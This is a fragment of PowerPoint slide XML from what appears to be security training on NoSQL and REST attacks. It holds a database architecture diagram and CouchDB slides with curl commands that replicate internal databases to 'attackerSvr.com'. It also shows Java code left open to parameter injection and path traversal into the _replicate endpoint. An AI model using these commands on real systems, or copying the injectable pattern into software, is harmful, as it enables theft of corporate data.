          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4040124" y="44973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AS4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4648199"/>
            <a:ext cx="381000" cy="1"/>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
        <p:nvSpPr>
          <p:cNvPr id="47" name="Flowchart: Terminator 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4725924" y="4497326"/>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ERP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Block Arc 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="990600"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1447798"/>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51" name="Straight Arrow Connector 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="1447798"/>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52" name="Flowchart: Terminator 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="12969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BH1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Block Arc 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="990601"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Arrow Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="1447799"/>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55" name="Straight Arrow Connector 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="1447799"/>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56" name="Flowchart: Terminator 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="1296924"/>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AS1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="1447798"/>
            <a:ext cx="381000" cy="1"/>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58" name="Flowchart: Terminator 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4722876" y="12969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Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Block Arc 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2133600" y="3124201"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Cloud 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3368040"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Arrow Connector 60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="3581399"/>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62" name="Straight Arrow Connector 61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2362200" y="3581400"/>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63" name="Flowchart: Terminator 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2592324" y="3430526"/>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BH3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Block Arc 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3581400" y="3124202"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65" name="Straight Arrow Connector 64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3581400"/>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66" name="Straight Arrow Connector 65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3810000" y="3581400"/>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67" name="Flowchart: Terminator 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4037076" y="34305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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="Straight Arrow Connector 67"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645152" y="3581399"/>
            <a:ext cx="381000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:headEnd type="arrow"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Flowchart: Terminator 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4838700" y="3314702"/>
            <a:ext cx="914400" cy="533400"/>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MS SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Cloud 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219200"/>
            <a:ext cx="1447800" cy="426719"/>
          </a:xfrm>
          <a:prstGeom prst="clou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Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Can 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="1752600"/>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Mongo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Can 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170019" y="2423162"/>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Couch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Can 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7170019" y="1083643"/>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Neo4j</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Can 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="3108960"/>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Cassan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Can 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="990600"/>
            <a:ext cx="914400" cy="838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LDAP/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Can 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162800" y="3810000"/>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HBase</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Left-Right Arrow Callout 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718048" y="2013204"/>
            <a:ext cx="1216152" cy="4158996"/>
          </a:xfrm>
          <a:prstGeom prst="lef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EAI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EII</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ESB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="78" name="Straight Arrow Connector 77"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6553199"/>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79" name="TextBox 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466721" y="6412468"/>
            <a:ext cx="6238879" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Http Protocol (proprietary protocols are different colors)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Can 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189069" y="4556762"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1725086177"/>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763000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Example (Couch DB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="8686800" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> POST http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://internalSrv.com:5984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/_replicate –d ‘{“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”}’ –H “Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>curl –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> POST http://srv.com:5984/_replicate –d ‘{“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://anotherInternalSvr.com:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>”:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackerSvr.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:5984/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>corpData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”}’ –H “Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394357745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763000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Apply Your Knowledge(Couch DB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = new URL(“http://svr.com:5984/customers/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“name”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>{\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>fullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”:\”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+ “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\”}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>How can you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> the data given the above?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148026888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763000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rest Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Exfiltration Apply Your Knowledge(Couch DB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="8686800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = new URL(“http://svr.com:5984/customers/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../_replicate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“name”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
